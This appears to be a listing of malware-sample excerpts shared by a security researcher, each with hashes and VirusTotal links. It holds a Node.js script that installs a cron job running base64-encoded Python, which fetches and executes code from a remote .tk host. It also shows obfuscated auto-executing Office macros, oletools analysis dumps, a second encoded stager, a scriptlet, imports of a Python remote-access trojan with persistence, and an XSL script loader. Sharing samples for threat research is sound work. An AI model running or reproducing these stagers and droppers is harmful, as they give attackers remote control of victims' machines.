This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict'; | |
// Do this as the first thing so that any code reading it knows the right env. | |
process.env.BABEL_ENV = 'development'; | |
process.env.NODE_ENV = 'development'; | |
require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vbGVveHRidXl4by50azo0NDMvbWNJZllwQmwyTVUtcHl1elpQMUZfd19HeDM3SFZ2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict'; | |
// Do this as the first thing so that any code reading it knows the right env. | |
process.env.BABEL_ENV = 'development'; | |
process.env.NODE_ENV = 'development'; | |
require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('import sys | |
vi=sys.version_info | |
ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=['build_opener']) | |
hs=[] | |
o=ul.build_opener(*hs) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## uploaded by @JohnLaTwC | |
## Sample hash: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531 | |
olevba 0.52dev7 - http://decalage.info/python/oletools | |
Flags Filename | |
----------- ----------------------------------------------------------------- | |
OLE:MASI---- 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531 | |
=============================================================================== | |
FILE: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531 | |
Type: OLE | |
------------------------------------------------------------------------------- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Uploaded by @JohnLaTwC | |
## Hash: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd | |
Sub AutoOpen() | |
Dim abjaWFApqTOaGknEZ As String | |
Dim EVvHI As Object | |
Dim aqwMEEghqLNesI As Integer | |
Dim TgAVw As String | |
aqwMEEghqLNesI = 816 | |
abjaWFApqTOaGknEZ = HyqtqSXGmk("5f7b6b7a") & "qx|6[pmtt" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Uploaded @JohnLaTwC | |
## Hash: 9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22 | |
## VT Link: https://www.virustotal.com/#/file/9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22/detection | |
var1 = '''aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm''' | |
import re | |
# Matches everything between two texts, returns the first match, Returns: str or False | |
var2 = '''8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xOTIuMTY4LjQyLjI0MDo0NDMvTjdBOFJaNnRnLVlYSndJelRLWkJGd2o1S0JxZDJmYTQtdWt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Uploaded by @JohnLaTwC | |
## Hash: cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e | |
## VTLink: https://www.virustotal.com/#/file/cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e/detection | |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="Pentest" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
import logging | |
from PIL import ImageGrab # /capture_pc | |
from shutil import copyfile, copyfileobj, rmtree, move # /ls, /pwd, /cd, /copy, /mv | |
from sys import argv, path, stdout # console output | |
from json import loads # reading json from ipinfo.io | |
from winshell import startup # persistence | |
from tendo import singleton # this makes the application exit if there's another instance already running | |
from win32com.client import Dispatch # WScript.Shell |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version='1.0'?> | |
<xsl:stylesheet version="1.0" | |
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" | |
xmlns:msxsl="urn:schemas-microsoft-com:xslt" | |
xmlns:sharp="http://sharp.shooter/mynamespace"> | |
<msxsl:script language="JScript" implements-prefix="sharp"> | |
function shooter(nodelist) { | |
<![CDATA[ | |
function setversion() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
olevba3 0.53.1 - http://decalage.info/python/oletools | |
Flags Filename | |
----------- ----------------------------------------------------------------- | |
OpX:MAS-H--- 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003 | |
=============================================================================== | |
FILE: 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003 | |
Type: OpenXML | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisWorkbook.cls | |
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
olevba3 0.53.1 - http://decalage.info/python/oletools | |
Flags Filename | |
----------- ----------------------------------------------------------------- | |
OpX:M-S-H--- 9a97b33b4f48f134e6b1524d1bae90982d2bb56f4ceb01cecbf9cc8827263d55 | |
=============================================================================== | |
FILE: 9a97b33b4f48f134e6b1524d1bae90982d2bb56f4ceb01cecbf9cc8827263d55 | |
Type: OpenXML | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisDocument.cls | |
in file: visio/vbaProject.bin - OLE stream: 'VBA/ThisDocument' |